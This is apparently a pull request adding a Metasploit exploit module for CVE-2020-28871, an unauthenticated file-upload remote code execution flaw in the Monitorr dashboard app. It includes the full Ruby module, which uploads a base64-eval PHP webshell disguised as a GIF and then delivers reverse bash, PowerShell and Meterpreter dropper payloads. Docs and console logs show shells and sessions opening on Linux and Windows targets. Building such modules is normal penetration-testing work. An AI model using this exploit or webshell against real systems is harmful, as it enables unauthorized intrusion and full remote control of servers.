### PR TITLE
Monitorr webshell upload RCE [CVE-2020-28871]

### DIFF
--- a/documentation/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
+++ b/documentation/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
@@ -2,7 +2,7 @@
 
 This module exploits an arbitrary file upload vulnerability (CVE-2020-28871) that results into an RCE in Monitorr,
 a web application that allows you to setup a dashboard to monitor various web site/web application up or down state.
-All versions including `v1.7.6m` are vulnerable and no patch is available.
+All versions including `v1.7.6m` and latest development release `v1.7.7d` are vulnerable and no patch is available.
 
 The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `GIF` file with
 embedded PHP code to the `assets/data/usrimg` (Linux) or `assets\data\usrimg` (Windows) directory on the web server

--- a/documentation/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
+++ b/documentation/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
@@ -1,0 +1,231 @@
+## Vulnerable Application
+
+This module exploits CVE-2020-28871, a Remote Code Execution (RCE) vulnerability in Monitorr, a web application
+that allows you to setup a dashboard to monitor various web site/web application up or down state.
+All versions including `v1.7.6m` are vulnerable and no patch is available.
+
+The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `GIF` file with
+embedded PHP code to the `assets/data/usrimg` (Linux) or `assets\data\usrimg` (Windows) directory on the web server
+using the vulnerable endpoint `/assets/php/upload.php`. Once uploaded to the server, depending on server configuration,
+the attacker can access the malicious `GIF` file via HTTP or HTTPS, thereby executing the malicious PHP code and
+gaining access to the system.
+
+This vulnerability does not require authentication and any remote attacker can exploit this vulnerability to gain
+access to the underlying operating system as the user under which the web services are running (typically `www-data`).
+
+Installing a vulnerable test bed requires a Linux or Windows machine with the vulnerable Monitorr software loaded.
+Follow instructions [Monitorr Install](https://github.com/Monitorr/Monitorr/wiki/01-Config:--Initial-configuration),
+to install the Monitorr application either on Linux or Windows.
+
+This module has been tested against a Monitorr installation with the specifications listed below:
+
+* Monitorr
+* Version: `1.7.6m`
+* Linux OS: Ubuntu 22.04
+* Windows OS: Windows Data Center 2019
+
+## Verification Steps
+
+1. `use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command, 2-Linux Dropper, 3-Windows command, or 4-Windows Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename and extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - PHP Meterpreter session
+```
+msf6 > use exploit/multi/http/monitorr_webshell_rce_cve_2020_28871
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > options
+Module options (exploit/multi/http/monitorr_webshell_rce_cve_2020_28871):
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       SugarCRM base url
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+   WEBSHELL                    no        The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell
+                                         name will be randomly generated if left unset.
+   When TARGET is not 0:
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
+                                        0.0.0.0 to listen on all addresses.
+   SRVPORT  1981             yes       The local port to listen on.
+Payload options (php/meterpreter/reverse_tcp):
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+Exploit target:
+   Id  Name
+   --  ----
+   0   PHP
+View the full module info with the info, or info -d command.
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.34
+rhosts => 192.168.201.34
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lhost 192.168.201.10
+lhost => 192.168.201.10
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set lport 4444
+lport => 4444
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 0
+target => 0
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.34
+[+] Deleted tsrezgkjwmtxyj.php
+[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.34:54680) at 2023-03-13 16:14:32 +0000
+
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - bash reverse shell
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 1
+target => 1
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted jzcjawsk.php
+[*] Command shell session 2 opened (192.168.201.10:4444 -> 192.168.201.34:58348) at 2023-03-13 16:16:06 +0000
+
+uname -a
+Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+### Monitorr 1.7.6m on Ubuntu Linux 22.04 - Linux Dropper Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 2
+target => 2
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/nAtmJo
+[*] Client 192.168.201.34 (Wget/1.21.2) requested /nAtmJo
+[*] Sending payload to 192.168.201.34 (Wget/1.21.2)
+[*] Sending stage (3045348 bytes) to 192.168.201.34
+[+] Deleted ebdzghdq.php
+[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.34:32922) at 2023-03-13 16:17:05 +0000
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.34
+OS           : Ubuntu 22.04 (Linux 5.15.0-60-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Windows Data Center 2019 - Powershell Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.36
+rhosts => 192.168.201.36
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > check
+[+] 192.168.201.36:80 - The target is vulnerable. Monitorr version: 1.7.6m
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 3
+target => 3
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Windows Command for cmd/windows/powershell/meterpreter/reverse_tcp
+[*] Sending stage (175686 bytes) to 192.168.201.36
+[+] Deleted dkvszuqil.php
+[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.36:54805) at 2023-03-13 16:18:53 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+### Monitorr 1.7.6m on Windows Data Center 2019 - Windows Dropper Meterpreter session
+```
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 4
+target => 4
+msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Monitorr version: 1.7.6m
+[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/EEFxVaRHZLJZNrF
+[*] Client 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /EEFxVaRHZLJZNrF
+[*] Sending payload to 192.168.201.36 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
+[*] Sending stage (200774 bytes) to 192.168.201.36
+[+] Deleted zyrkwyinvjnzr.php
+[*] Meterpreter session 5 opened (192.168.201.10:4444 -> 192.168.201.36:54882) at 2023-03-13 16:19:52 +0000
+[*] Command Stager progress - 100.00% done (155/155 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer        : WIN-HHRQENPDSRS
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+## Limitations
+No limitations identified.

--- a/documentation/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
+++ b/documentation/modules/exploit/multi/http/monitorr_webshell_rce_cve_2020_28871.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
-This module exploits CVE-2020-28871, a Remote Code Execution (RCE) vulnerability in Monitorr, a web application
-that allows you to setup a dashboard to monitor various web site/web application up or down state.
+This module exploits an arbitrary file upload vulnerability (CVE-2020-28871) that results into an RCE in Monitorr,
+a web application that allows you to setup a dashboard to monitor various web site/web application up or down state.
 All versions including `v1.7.6m` are vulnerable and no patch is available.
 
 The vulnerability occurs due to a lack of appropriate validation when uploading a malicious `GIF` file with

--- a/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
+++ b/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
@@ -1,0 +1,236 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Monitorr unauthenticated Remote Code Execution (RCE)',
+        'Description' => %q{
+          This module exploits a Remote Code Execution vulnerability that has been identified in the Monitorr application.
+          Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation.
+          Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges
+          under which the web services run (typically user www-data).
+          Monitorr 1.7.6m and below are affected.
+        },
+        'Author' => [
+          'Lyhins Lab', # discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2020-28871' ],
+          [ 'URL', 'https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/' ],
+          [ 'URL', 'https://attackerkb.com/topics/UNlzoDVL3o/cve-2020-28871' ],
+          [ 'EDB', '48980' ],
+          [ 'PACKETSTORM', '163263' ],
+          [ 'PACKETSTORM', '170974' ]
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => [ 'unix', 'linux', 'win', 'php' ],
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows EXE Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-11-16',
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The Monitorr endpoint URL', '/' ]),
+        OptString.new('WEBSHELL', [
+          false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', ''
+        ]),
+        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])
+      ]
+    )
+  end
+
+  def upload_php_code(payload)
+    # Upload webshell hidden in a GIF with Metasploit payload code
+    # randomize file name if option WEBSHELL is not set. Use lowercase characters because upload stores file name in lowercase
+    if datastore['WEBSHELL'].blank?
+      @webshell_name = "#{Rex::Text.rand_text_alpha_lower(8..16)}.php"
+    else
+      @webshell_name = datastore['WEBSHELL'].to_s.downcase
+    end
+
+    # construct multipart form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part(payload.prepend("GIF89a#{rand_text_numeric(6..8)}"), 'image/gif', 'binary', "form-data; name=\"fileToUpload\"; filename=\"#{@webshell_name}\"")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'php', 'upload.php'),
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+    return false unless res && res.code == 200 && !res.body.blank?
+
+    # parse HTML response to find the id with value 'uploadok' that indicates a successful upload
+    html = res.get_html_document
+    if html.at('div[@id="uploadok"]')
+      return true
+    else
+      return false
+    end
+  end
+
+  def check_vuln
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'js', 'version', 'version.txt'),
+      'ctype' => 'application/x-www-form-urlencoded'
+    })
+    if res && res.code == 200 && !res.body.blank?
+      return res.body
+    else
+      return nil
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = Base64.strict_encode64(datastore['COMMAND'])
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'data', 'usrimg', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'data', 'usrimg', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def check
+    version = check_vuln
+    if version.nil?
+      Exploit::CheckCode::Safe
+    else
+      return CheckCode::Vulnerable("Monitorr version: #{version}") if version =~ /1.7.6/
+
+      return CheckCode::Appears("Monitorr version: #{version}")
+    end
+  end
+
+  def exploit
+    # select webshell depending on the target setting (PHP or others).
+    # randomize and encode all parameters to obfuscate the payload and execution
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    if target['Type'] == :php
+      @webshell = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+    else
+      @webshell = "<?=base64_decode($_GET[\'#{@get_param}\'])(base64_decode($_POST[\'#{@post_param}\']));?>"
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed, the system is likely patched.") unless upload_php_code(@webshell)
+    register_file_for_cleanup(@webshell_name.to_s)
+
+    case target['Type']
+    when :php
+      execute_php(payload.encoded)
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(linemax: 65536)
+    when :windows_command
+      execute_command(payload.encoded)
+    when :windows_dropper
+      execute_cmdstager(flavor: :psh_invokewebrequest, linemax: 65536)
+    end
+  end
+end

--- a/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
+++ b/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
@@ -70,9 +70,6 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ ARCH_X64, ARCH_X86 ],
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-              }
             }
           ],
           [
@@ -145,11 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # parse HTML response to find the id with value 'uploadok' that indicates a successful upload
     html = res.get_html_document
-    if html.at('div[@id="uploadok"]')
-      return true
-    else
-      return false
-    end
+    !!html.at('div[@id="uploadok"]')
   end
 
   def check_vuln

--- a/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
+++ b/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
@@ -18,15 +18,15 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Monitorr unauthenticated Remote Code Execution (RCE)',
         'Description' => %q{
-          This module exploits a Remote Code Execution vulnerability that has been identified in the Monitorr application.
+          This module exploits an arbitrary file upload vulnerability and achieving an RCE in the Monitorr application.
           Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation.
           Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges
           under which the web services run (typically user www-data).
           Monitorr 1.7.6m, 1.7.7d and below are affected.
         },
         'Author' => [
-          'Lyhins Lab', # discovery
-          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
+          'Lyhins Lab' # discovery
         ],
         'References' => [
           [ 'CVE', '2020-28871' ],

--- a/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
+++ b/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     payload = Base64.strict_encode64(cmd)
     php_cmd_function = Base64.strict_encode64(datastore['COMMAND'])
-    return send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'data', 'usrimg', @webshell_name),
       'ctype' => 'application/x-www-form-urlencoded',
@@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_php(cmd, _opts = {})
     payload = Base64.strict_encode64(cmd)
-    return send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'data', 'usrimg', @webshell_name),
       'ctype' => 'application/x-www-form-urlencoded',
@@ -187,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
       version = Rex::Version.new(res.body)
       return CheckCode::Vulnerable("Monitorr version: #{version}") if version.between?(Rex::Version.new('0.8.6'), Rex::Version.new('1.7.7'))
     end
-    return CheckCode::Unknown
+    CheckCode::Unknown
   end
 
   def exploit

--- a/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
+++ b/modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
           Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation.
           Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges
           under which the web services run (typically user www-data).
-          Monitorr 1.7.6m and below are affected.
+          Monitorr 1.7.6m, 1.7.7d and below are affected.
         },
         'Author' => [
           'Lyhins Lab', # discovery
@@ -70,6 +70,9 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ ARCH_X64, ARCH_X86 ],
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
             }
           ],
           [
@@ -145,19 +148,6 @@ class MetasploitModule < Msf::Exploit::Remote
     !!html.at('div[@id="uploadok"]')
   end
 
-  def check_vuln
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'js', 'version', 'version.txt'),
-      'ctype' => 'application/x-www-form-urlencoded'
-    })
-    if res && res.code == 200 && !res.body.blank?
-      return res.body
-    else
-      return nil
-    end
-  end
-
   def execute_command(cmd, _opts = {})
     payload = Base64.strict_encode64(cmd)
     php_cmd_function = Base64.strict_encode64(datastore['COMMAND'])
@@ -187,14 +177,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    version = check_vuln
-    if version.nil?
-      Exploit::CheckCode::Safe
-    else
-      return CheckCode::Vulnerable("Monitorr version: #{version}") if version =~ /1.7.6/
-
-      return CheckCode::Appears("Monitorr version: #{version}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'js', 'version', 'version.txt'),
+      'ctype' => 'application/x-www-form-urlencoded'
+    })
+    if res && res.code == 200 && !res.body.blank?
+      # version 0.8.6d is the first release where versioning using version.txt is introduced according the release notes.
+      version = Rex::Version.new(res.body)
+      return CheckCode::Vulnerable("Monitorr version: #{version}") if version.between?(Rex::Version.new('0.8.6'), Rex::Version.new('1.7.7'))
     end
+    return CheckCode::Unknown
   end
 
   def exploit


### PR DESCRIPTION
Monitorr is a simple web application that allows you to setup a dashboard to monitor various web site / web application up or down state. It has been around for a while and is supported on both Linux and Windows, but development seems to be stalled.
Unfortunately this nice neat web application suffers from a remote code execution vulnerability that allows an attacker to upload a webshell tagged as a GIF image and execute malicious php code in the upload directory where the malicious file is stored (Linux: `<web_root>/assets/data/usrimg` or Windows: `<web_root\assets\data\usrimg`).

All versions including `v1.7.6m` and development release `1.7.7d` are vulnerable and no patch is available.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `exploit(multi/http/monitorr_webshell_rce_cve_2020_28871`
- [ ] set `LHOST` with target IP
- [ ] set `LPORT` with target port
- [ ] set TARGET with 0 (PHP), 1 (UNIX cmd), 2 (Linux Dropper), 3 (Windows cmd) or 4 (Windows EXE dropper)
- [ ]  `exploit`

You should get a reverse bash shell or meterpreter session depending on the target setting.

Monitorr is supported on Linux and Windows and is tested on Ubuntu 22.04 and Windows Datacenter 2019.
This module has been tested on both platforms and the installation instructions can be found here: [Monitorr Install](https://github.com/Monitorr/Monitorr/wiki/01-Config:--Initial-configuration)

### PHP target - Meterpreter
```
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.34
rhosts => 192.168.201.34
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > check
[+] 192.168.201.34:80 - The target is vulnerable. Monitorr version: 1.7.6m
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.34
[+] Deleted tsrezgkjwmtxyj.php
[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.34:54680) at 2023-03-13 16:14:32 +0000

meterpreter > sysinfo
Computer    : cuckoo
OS          : Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### Linux command - reverse bash
```
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 1
target => 1
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted jzcjawsk.php
[*] Command shell session 2 opened (192.168.201.10:4444 -> 192.168.201.34:58348) at 2023-03-13 16:16:06 +0000

uname -a
Linux cuckoo 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Linux dropper - Meterpreter
```
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 2
target => 2
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/nAtmJo
[*] Client 192.168.201.34 (Wget/1.21.2) requested /nAtmJo
[*] Sending payload to 192.168.201.34 (Wget/1.21.2)
[*] Sending stage (3045348 bytes) to 192.168.201.34
[+] Deleted ebdzghdq.php
[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.34:32922) at 2023-03-13 16:17:05 +0000
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.34
OS           : Ubuntu 22.04 (Linux 5.15.0-60-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### Windows Command - Powershell Meterpreter
```
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set rhosts 192.168.201.36
rhosts => 192.168.201.36
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > check
[+] 192.168.201.36:80 - The target is vulnerable. Monitorr version: 1.7.6m
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > set target 3
target => 3
msf6 exploit(multi/http/monitorr_webshell_rce_cve_2020_28871) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Monitorr version: 1.7.6m
[*] Executing Windows Command for cmd/windows/powershell/meterpreter/reverse_tcp
[*] Sending stage (175686 bytes) to 192.168.201.36
